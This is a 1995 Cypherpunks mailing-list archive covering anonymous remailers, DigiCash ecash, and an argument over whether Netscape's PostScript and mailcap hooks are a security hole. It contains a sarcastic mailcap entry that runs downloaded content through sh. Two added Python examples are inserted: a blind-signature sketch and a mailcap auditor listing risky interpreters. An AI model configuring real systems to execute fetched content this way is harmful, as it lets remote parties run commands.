This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
replay   remailer@replay.com              ******+*****     7:15  99.99%
mix      mixmaster@remail.obscura.com     + ---------   1:36:59  99.84%
hacktic  remailer@utopia.hacktic.nl       *   ********    10:05  99.80%
portal   hfinney@shell.portal.com            ******###     1:52  99.78%
alumni   hal@alumni.caltech.edu           +  ++-*+++#*     6:28  99.71%
rmadillo remailer@armadillo.com           + ++++++++++    43:31  99.67%
ecafe    remail@ecafe.org                 -    ****###     3:31  99.67%
spook    remailer@valhalla.phoenix.net    ** *********    16:56  99.60%
wmono    wmono@valhalla.phoenix.net       * **********    13:16  99.58%
penet    anon@anon.penet.fi                 -+-- ----+  5:07:54  99.03%
ideath   remailer@ideath.goldenbear.com   --------.-    4:44:16  96.61%
c2       remail@c2.org                    +  +++++        57:02  96.35%
flame    remailer@flame.alias.net         + ****+  * *    26:48  94.29%
vishnu   mixmaster@vishnu.alias.net        * ****  * *     9:26  93.72%
bsu-cs   nowhere@bsu-cs.bsu.edu           #   ** ***    1:20:32  92.71%
rahul    homer@rahul.net                  *# ** ****##     2:20  99.71%
ford     remailer@bi-node.zerberus.de     . ----._     22:58:20  73.77%
syrinx   syrinx@c2.org                    - ---+--      1:30:08  57.37%
extropia remail@extropia.wimsey.com       - ------      4:48:34  50.13%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcel van der Peijl <bigmac@digicash.com>
Date: Sun, 22 Oct 95 23:02:56 PDT
To: cypherpunks@toad.com
Subject: Re: digicash & unix clients
Message-ID: <199510230602.HAA24973@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer <sameer@c2.org> wrote:
>	I haven't seen any listing of the platforms supported by the
>live digicash system. Does anyone know where that information is
>available? Thanks.

It will be the exact same list as ecash trial (but not exactly the same 
software). It will be available by the time real accounts are issued. 
Hopefully tomorrow. Working on it.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcel van der Peijl <bigmac@digicash.com>
Date: Sun, 22 Oct 95 23:11:25 PDT
To: cypherpunks@toad.com
Subject: Re: Re: Chaum's cash: backup?
Message-ID: <199510230611.HAA25001@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


"James A. Donald" <jamesd@echeque.com> wrote:
>>if it was like "real" cash, then it really would be lost.
>It is really lost.
>Your disk drive contains information the bank *cannot* know.
>If you do not know that information either, you cannot prove to
>the bank or anyone else that you rightfully possess a legitimate coin.

You seem to have different information than we have. Strange. Please 
reread the press release.

I could give a hint: your random state initializer is not the too-often 
used srand( time( NULL ) ) but user-chosen during installation. Write 
that initializer down and you can re-generate all coins. The bank can 
check whether these coins were indeed signed, and, after revealing 
blinding factors, the bank can also check if they were used. The 
difference must have been on your disk.

This system is not completely operational yet but will be used in the 
future.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."
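The withdrawal "envelopes" from the press release and the seed-based recovery described in the reply above, as an added example that is not part of either message and is not DigiCash code. It assumes textbook RSA blind signatures as a stand-in (the messages do not name the algorithm), a toy bank key built from two Mersenne primes, and HMAC-based derivation of serials and blinding factors; every function, class and constant name is hypothetical.

```python
import hashlib
import hmac
from math import gcd

# Toy RSA key for the bank, constructed for this example from two Mersenne
# primes. Far too small for real use; the algorithm itself is an assumption.
P, Q = 2**61 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))       # bank's private exponent


def digest_int(serial: bytes) -> int:
    """Hash a coin serial number to the integer that actually gets signed."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def derive(seed: bytes, index: int):
    """Re-creatable (serial, blinding factor) for coin `index` from the seed."""
    serial = hmac.new(seed, b"serial%d" % index, hashlib.sha256).digest()
    counter = 0
    while True:
        raw = hmac.new(seed, b"blind%d/%d" % (index, counter),
                       hashlib.sha512).digest()
        r = int.from_bytes(raw, "big") % N
        if r > 1 and gcd(r, N) == 1:     # r must be invertible mod N
            return serial, r
        counter += 1


def blind(serial: bytes, r: int) -> int:
    """Put the coin in its envelope: H(serial) * r^e mod N."""
    return digest_int(serial) * pow(r, E, N) % N


def unblind(blind_sig: int, r: int) -> int:
    """Remove the envelope, leaving the bank's signature on the serial."""
    return blind_sig * pow(r, -1, N) % N


def verify(serial: bytes, sig: int) -> bool:
    return pow(sig, E, N) == digest_int(serial)


class Bank:
    def __init__(self):
        self.issued = set()   # blinded values signed at withdrawal
        self.spent = set()    # serial numbers deposited or refunded

    def withdraw(self, blinded: int) -> int:
        # The bank signs without ever seeing the serial number.
        self.issued.add(blinded)
        return pow(blinded, D, N)

    def deposit(self, serial: bytes, sig: int) -> str:
        if not verify(serial, sig):
            return "bad signature"
        if serial in self.spent:
            return "double spend"
        self.spent.add(serial)
        return "ok"

    def recover(self, openings):
        """Take (serial, r) pairs re-derived from the seed and return the
        serials that were signed at withdrawal but never deposited.
        Refunded serials are marked spent (an assumption of this sketch)."""
        lost = []
        for serial, r in openings:
            if blind(serial, r) in self.issued and serial not in self.spent:
                self.spent.add(serial)
                lost.append(serial)
        return lost


def demo():
    bank = Bank()
    seed = b"constructed example seed, written down at install time"
    wallet = []
    for i in range(3):                       # withdraw three coins
        serial, r = derive(seed, i)
        sig = unblind(bank.withdraw(blind(serial, r)), r)
        wallet.append((serial, sig))
    results = [bank.deposit(*wallet[0]),     # a shop deposits coin 0
               bank.deposit(*wallet[0])]     # the same coin offered again
    # The disk is lost and only the seed survives: re-derive every opening.
    lost = bank.recover([derive(seed, i) for i in range(3)])
    return results, wallet, lost, bank


if __name__ == "__main__":
    results, wallet, lost, _ = demo()
    print(results, [s.hex()[:16] for s in lost])
```

Revealing a blinding factor links that withdrawal to its serial number, so in this sketch the user gives up unlinkability only for the coins being claimed as lost.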







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Mon, 23 Oct 95 17:31:07 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <199510222108.OAA05412@jobe.shell.portal.com>
Message-ID: <951023.071054.7N0.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Alice de 'nonymous keeps on going.

Hey, Alice... either post an EXPLOIT using this supposed hole or SHUT
UP!
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org
           "I used to be disgusted, but now I'm just amused."
            -- from an old T-shirt(ca. 1975), not an Elvis Costello lyric

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIuHXxvikii9febJAQF3XQQAnhkpoyPSuDxrBgl3LlpC9oeXXs0j6AHi
Vd5CX7cvF6lSd9aMPVfa/3hzDz6aMawEnXURRTfzsnhMb7B+Y0VvC8D+rqXKE5jb
Doma3efaYYr8oi8xism0P8BASwabP2kUnGjBXdrg5PteiRfihh0SBCcj7u3klsI5
hEuOQAI9uO4=
=3xvF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 04:37:55 PDT
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: airport security
In-Reply-To: <Pine.OSF.3.91.951022131818.9371D-100000@Joyce-Perkins.tenet.edu>
Message-ID: <199510231136.HAA03942@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Harmon writes:
> Another aspect of the requirement for the name on a ticket is to 
> discourage the development of a secondary, uncontrolled market in tickets.

We all know how horrible that would be.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 23 Oct 95 08:42:33 PDT
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION TO OFFER REWARD FOR REVEALING HOLES IN ECASH
Message-ID: <199510231537.IAA15846@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Contact: Sameer Parekh
	 sameer@c2.org
         510-601-9777 (pager: 510-321-1014)

COMMUNITY CONNEXION TO OFFER REWARD FOR REVEALING HOLES IN ECASH

October 23, 1995 - Community ConneXion, an internet privacy provider
in Berkeley, California, announced the extension of its existing
"Hack" contests to the electronic cash system announced today by
Digicash bv and Mark Twain Bank.

"The ecash deployment is an important step towards making internet
commerce more than just a curiosity," said Sameer Parekh, President of
Community ConneXion. The contest is meant, as with the other "Hack"
promotions being run by Community ConneXion, to encourage the
examination of the security of the ecash system so as to reveal holes
before they are exploited by a criminal element.

Community ConneXion hopes that the inquiry being done into the
security of these products results in a secure infrastructure for the
new paradigms provided by internet commerce. "All internet commerce
systems thus far released have been based in old, out-of-date,
insecure technology, such as credit cards. DigiCash is the first
revolutionary system which can change the way we do business," said
Parekh. "If the move to internet commerce does not radically improve
the way people do business, then we have not taken full advantage of
the potential inherent in the technology."

Details regarding the Hack DigiCash promotion are available on
Community ConneXion's webserver at http://www.c2.org/hackecash/.
Contest submissions should be sent to hackecash@c2.org.

Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and pseudonym servers, in addition to
the standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org/ or from sending email to
info@c2.org.

Ecash, DigiCash, Cyberbucks, and Mark Twain Bank are trademarks of
their respective owners. This promotion is not affiliated with
DigiCash bv nor Mark Twain Bank.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@obscura.com (Mixmaster)
Date: Mon, 23 Oct 95 09:40:54 PDT
To: cypherpunks@toad.com
Subject: Saudi Arabia?
Message-ID: <199510231640.JAA17600@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know what restrictions there might be on the use
of crypto (pgp) in Saudi Arabia?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 06:44:11 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <199510222108.OAA05412@jobe.shell.portal.com>
Message-ID: <199510231344.JAA04051@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Anonymous has a good reason to be anonymous -- he's an annoying
fool.

Yes, Mr. Anonymous, we all know postscript is dangerous. Thank you for
this stunning revelation. We've read the IETF documents before, and
some of us even helped write them.

anonymous-remailer@shell.portal.com writes:
> Clearly, someone has a vested interest which they are expending a 
> great deal of effort to protect.  My email to Netscape detailing their 
> logic bomb has gone unanswered, and unacknowledged for ten days now.

Maybe because you're an idiot and they don't feel that it's necessary
to answer. What more need be said?

Those of us who care run our postscript interpreters with all the
dangerous commands stripped out, but given that Netscape doesn't
supply postscript interpreters, it's not really their fault or
problem.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Mon, 23 Oct 95 07:46:13 PDT
To: cypherpunks@toad.com
Subject: Re: textbooks
Message-ID: <v02130501acb11584d1f9@[199.1.11.226]>
MIME-Version: 1.0
Content-Type: text/plain


>I have also heard good things about a book by Warwick Ford.

"Computer Communications Security", Warwick Ford,
PTR Prentice Hall, 0-13-799453-2

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 23 Oct 95 07:16:40 PDT
To: perry@piermont.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <199510231344.JAA04051@jekyll.piermont.com>
Message-ID: <9510231413.AA26514@all.net>
MIME-Version: 1.0
Content-Type: text


> Mr. Anonymous has a good reason to be anonymous -- he's an annoying

Perhaps.

> fool.

I don't agree.

> Yes, Mr. Anonymous, we all know postscript is dangerous. Thank you for
> this stunning revelation. We've read the IETF documents before, and
> some of us even helped write them.

Then you should support his point which is valid.

> anonymous-remailer@shell.portal.com writes:
> > Clearly, someone has a vested interest which they are expending a 
> > great deal of effort to protect.  My email to Netscape detailing their 
> > logic bomb has gone unanswered, and unacknowledged for ten days now.
> 
> Maybe because you're an idiot and they don't feel that it's necessary
> to answer. What more need be said?

Being insulting and calling people names benefits nobody.

> Those of us who care run our postscript interpreters with all the
> dangerous commands stripped out, but given that Netscape doesn't
> supply postscript interpreters, it's not really their fault or
> problem.

I strongly disagree.  If Netscape provided a way to execute shell
commands on your host from a remote computer, it would certainly be a
hole created by their product.  The fact that the default shell is
potentially dangerous means it's incumbent on those who provide access
to it to provide adequate protection.

If Netscape wants to claim their product doesn't degrade security, they
should provide a safe postscript interpreter or not provide hooks to
unsafe ones.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Mon, 23 Oct 95 08:33:26 PDT
To: pkoning@chipcom.com
Subject: Re: "power one time pad"
In-Reply-To: <3087F1A2@mailer2>
Message-ID: <doug-9509231532.AA014714381@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



At the risk of beating a mutilated horse carcass:

>
>Among other things, it says that POTP "doesn't use an encryption algorithm;
>instead it synchronizes random processes on two computers as they
>communicate".  (I wonder if the author understands that that's just another
>way to describe encryption algorithms...)  The other claim is that it
>eliminates the need to manage keys.  "... there is no need for central
>servers where PGP keys ... are kept".
>
Well, PGP does have keys. You have your private key and your public key, and
they have to be managed somehow (stored on disk) even if it's not centrally.
Other algorithms like Kerberos have more complex key management issues.
This has no key, and hence no management.

>This seems like a strange claim because of course PGP doesn't require
>central servers, but more importantly, you can't do authentication without
>at least one piece of keying data being established out of band.  That
>could be a certification authority public key, but you need something
>to get started.
>
This is the most confusing part of the whole thing. How does it get started?
Unfortunately, as this is embroiled in non-disclosure and patent-pending,
we're not going to know, but are forced to take the word of experts such
as David Kahn that it works as advertised.

>Supposedly this thing was shown at Interop.  Did anyone see it, and does
>the product make sense even if the article didn't?
>
Yes, I and a friend of mine were the only two people in the audience
that were not Journalists.  It does look rather intriguing, but so much
negativism is flying about, that most people have dismissed it out of hand.

>(One thing that disturbs me about the product name is the use of the
>phrase "one time pad".  Since the "random" processes are presumably
>not random but rather pseudo-random, there is no one time pad involved
>at all, but rather a plain old stream cypher of some sort, which may or
>may not be secure in practice but cannot have the "secure from first
>principles" property that real one time pad has.)
>
Yeah, this is a bit of a marketing issue. It doesn't use a cryptographically
strong random number generation scheme. Instead, some kind of state about
the two machines and the message stream is used to perform synchronization.
Then, the message itself is supposed to impart the non-repetitive nature
for the non-repeating "One time pad".
 So, in the sense that it never repeats, it could be called a one time pad,
and that's how they are using it. However, according to the traditional
definitions of a one time pad with a strong random number and no correlation,
it may not pass.

I believe they also use a random number stream somehow.. e.g. both parties
observe some random number stream, as well as the randomness in the message
itself to construct the pad. It would seem that if you wanted to decode
message N of an M message sequence, you would need all of the messages 1
through N to do it. If any one of them was missing, you couldn't decode
N itself.
--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
	Apple T-shirt on Win95 - "Been there, done that"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 23 Oct 95 08:01:02 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <9510231413.AA26514@all.net>
Message-ID: <LAA19345.199510231500@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9510231413.AA26514@all.net>, Dr. Frederick B. Cohen writes:
[...]
>I strongly disagree.  If Netscape provided a way to execute shell
>commands on your host from a remote computer, it would certainly be a
>hole created by their product.  The fact that the default shell is
>potentially dangerous means it's incumbent on those who provide access
>to it to provide adequate protection.

They do, add:

application/x-shell; sh %s

to your .mailcap.

They had better stop supporting mailcap altogether, after all *any*
of the programs in there could have buffer overflows, or other
security problems.  I'll bet some of them even do, anyone want to
see if sox (a program that transforms sound files from format to
format - frequently used to convert .wav files to .au files) has
any overruns in the chunk handling code?

>If Netscape wants to claim their product doesn't degrade security, they
>should provide a safe postscript interpreter or not provide hooks to
>unsafe ones.

Sure, and they had better find a way to keep us from editing the binary
and adding whatever insecure features we may want to their program.

obcrypto: maybe it would be a good idea for programs to list problems that
are beyond their control.  To many people it may be surprising that anything
in their .mailcap could hurt them.  To others it is hardly a shock and seeing
a lot of messages about it tends to get rather boring, esp. as a few people
jump up and down and yell about the Danger To Us All...
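
[Added example, not part of the original thread and not code from any
participant or from Netscape: a small auditor for the .mailcap hooks this
exchange is about. It parses mailcap entries and flags view commands that
hand fetched content to a command interpreter, or to Ghostscript without
its -dSAFER option. The interpreter lists and the sample file are
assumptions constructed for illustration.]

```python
import shlex
from dataclasses import dataclass

# Assumed lists for this example; extend them for your own site.
INTERPRETERS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh",
                "perl", "python", "tclsh", "wish"}
POSTSCRIPT = {"gs", "ghostscript"}
SEPARATORS = {"|", ";", "&&", "||"}


@dataclass
class Finding:
    mime_type: str
    command: str
    reason: str


def split_fields(entry):
    """Split one mailcap entry on semicolons that are not backslash-escaped."""
    fields, cur, i = [], [], 0
    while i < len(entry):
        if entry[i] == "\\" and i + 1 < len(entry):
            cur.append(entry[i:i + 2])      # keep the escape for shlex
            i += 2
            continue
        if entry[i] == ";":
            fields.append("".join(cur).strip())
            cur = []
        else:
            cur.append(entry[i])
        i += 1
    fields.append("".join(cur).strip())
    return fields


def parse_mailcap(text):
    """Yield (mime_type, view_command), joining backslash-continued lines."""
    pending = ""
    for raw in text.splitlines():
        if raw.endswith("\\"):
            pending += raw[:-1]
            continue
        line = (pending + raw).strip()
        pending = ""
        if not line or line.startswith("#"):
            continue
        fields = split_fields(line)
        if len(fields) >= 2 and fields[1]:
            yield fields[0].lower(), fields[1]


def check_stage(argv):
    """Return a reason string if this pipeline stage is risky, else None."""
    prog = argv[0].rsplit("/", 1)[-1]
    if prog in INTERPRETERS:
        return "content is passed to command interpreter '%s'" % prog
    if prog in POSTSCRIPT and "-dSAFER" not in argv:
        return "PostScript interpreter '%s' run without -dSAFER" % prog
    return None


def audit(text):
    """Return one Finding per mailcap entry whose view command is risky."""
    findings = []
    for mime_type, command in parse_mailcap(text):
        try:
            tokens = shlex.split(command)
        except ValueError:
            findings.append(Finding(mime_type, command, "unparseable command"))
            continue
        stage = []
        for tok in tokens + [";"]:          # sentinel flushes the last stage
            if tok not in SEPARATORS:
                stage.append(tok)
                continue
            reason = check_stage(stage) if stage else None
            stage = []
            if reason:
                findings.append(Finding(mime_type, command, reason))
                break
    return findings


# Constructed sample ~/.mailcap, not taken from any real system.
SAMPLE = """\
# constructed sample
application/x-shell; sh %s
application/postscript; gs -q -dNOPAUSE %s
application/postscript; gs -dSAFER -q \\
    -dNOPAUSE %s; description=PostScript
audio/x-wav; sox %s -t .au - | audioplay
image/*; xv %s
"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print("%-24s %-28s %s" % (f.mime_type, f.command, f.reason))
```

[The check looks only at program names and flags; a helper that is not an
interpreter, such as the sox entry above, passes even though its own
parsing code may be unsafe, which is the point raised in the message.]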




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 08:14:41 PDT
To: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Subject: Re: airport security
In-Reply-To: <yDDeDD1w165w@left.webcasters.com>
Message-ID: <199510231514.LAA04145@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This really isn't a cypherpunks topic any longer...

Jim Grubs (W8GRT) writes:
> Alan Horowitz <alanh@infi.net> writes:
> 
> > measures, etc, etc. The other side *has already won* the terror war, 
> > merely by virtue of having set the agenda, and making us spin in tighter 
> > and tighter circles - reacting, not initiating.
> 
> What, then?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 08:32:06 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <9510231413.AA26514@all.net>
Message-ID: <199510231531.LAA04194@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dr. Frederick B. Cohen writes:
> > Mr. Anonymous has a good reason to be anonymous -- he's an annoying
> 
> Perhaps.
> 
> > fool.
> 
> I don't agree.

Could that be because his style and yours are rather similar? I
haven't had an opportunity to compare word statistics yet...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 08:42:13 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510230720.AAA15634@jobe.shell.portal.com>
Message-ID: <199510231541.LAA04222@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> Ha!  I reported a serious problem to Netscape ten days ago, on Thursday
> the twelfth.  They haven't even returned an answer to my email yet nor
> even acknowledged its receipt. 

Your "problem", that is, that postscript can be dangerous, isn't a
netscape bug, deserves no bounty, and you should feel glad that they
are merely ignoring you.

Now go away.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 08:43:43 PDT
To: Frosty <sotmesc@datasync.com>
Subject: Re: CSP
In-Reply-To: <199510230156.UAA09239@osh1.datasync.com>
Message-ID: <199510231543.LAA04230@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This isn't cypherpunks material. Please go away.

Frosty writes:
> AT&T ACCUSED OF DEFRAUDING !!!
> 
>      New York - AT&T Corp. is accused in a lawsuit of cheating millions of
> residential long-distance customers out of billions of dollars by rounding
> off calls to the next full minute.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Mon, 23 Oct 95 09:34:47 PDT
To: cypherpunks@toad.com
Subject: Re: FidoNet Remailer
Message-ID: <THmFDD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

RobL <robl@on-ramp.ior.com> writes:

> At 04:34 PM 10/20/95 -0400, Jim Cannell wrote:
> >
> >=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> >
> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> >I have been a long time lurker on this list, as well as having a long time
> >interest in crypto.  Most of my activity in this area has been on FidoNet
> >rather than the internet.  Due to the control phreak nature of much of
> >FidoNet, I've spent a lot of time and effort in an attempt to just simply
> >route around the bastards.  I created the SecureMail system, which is a
> >network of FidoNet nodes that agree to route any and all traffic without
> >monitoring or censorship.  Within SecureMail, encrypted traffic is not
> >only permitted, it is encouraged.
> 
> 
> At the end of the month, I will be putting my BBS back online with new
> software which is more Fido friendly than what I had been using.. I would be

The Fido remailer appears to be drawing some interest. Fidonet is often
criticized (by me among many, many others) for being dull, provincial, and
dominated by power phreaks.

However, the Fidonet connectivity protocols have much to be admired from the
'punks perspective. Internet has great speed and bandwidth, but network
routing is "hardwired." Fidonet is frequently slow and narrowband, but
routing is much more flexible. The so-called "nodelist" contains the node
number (the equivalent of IP number), various technical parameters, and the
dial-up telephone number and availability schedule at which e-mail/data calls
can be accepted.

Since the access number of every site in the network is known, you can send
e-mail directly to the destination site if you wish not to use standard,
fixed routing. This, plus call forwarding and laptops at pre-arranged
temporary locations, means Freeh's wiretap problem is now the need to monitor
every call at every ESS.  Hence, his curious request for huge wiretap
capacity.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 23 Oct 95 09:18:42 PDT
To: cypherpunks@toad.com
Subject: Re: Mondex vs. Digicash (was: Godzilla vs. Mothra)
Message-ID: <v02120d01acb170bb505e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

To: rah@shipwright.com (Robert Hettinga), www-buyinfo@allegra.att.com,
        ecm@ai.mit.edu, bsdc@ai.mit.edu
Cc: hallam@w3.org
Subject: Re: (cpx) Mondex vs. Digicash (was: Godzilla vs. Mothra)
Date: Mon, 23 Oct 95 12:06:43 -0400
From: hallam@w3.org
X-Mts: smtp
Sender: bounce-bsdc@ai.mit.edu
Precedence: bulk
Reply-To: hallam@w3.org


Some comments on the comments:


> The availability of Digicash in the US, for real, with spender
  anonymity, will be announced very soon; reporter activity on
  this subject is consistent with an embargoed press release for
  Monday or Tuesday. From posts to the list it's clear that a fully
  working system, ready for customers, will be announced.

The availability in the US I don't consider as meaning much one way or
the other. Mondex is available in Swindon in the UK, a very large and very
serious real world trial.

More importantly Mondex has Wells Fargo Bank behind it and NatWest and HKSB,
these are major league players with very tight coupling, cross ownership of
subsidiaries etc.

> When doing market research on this subject, it became clear that
  low-value payments are largely going to be used for impulse
  purchases. If the Digicash system allows people to set up their
  accounts without getting out of their chairs (which I suspect will
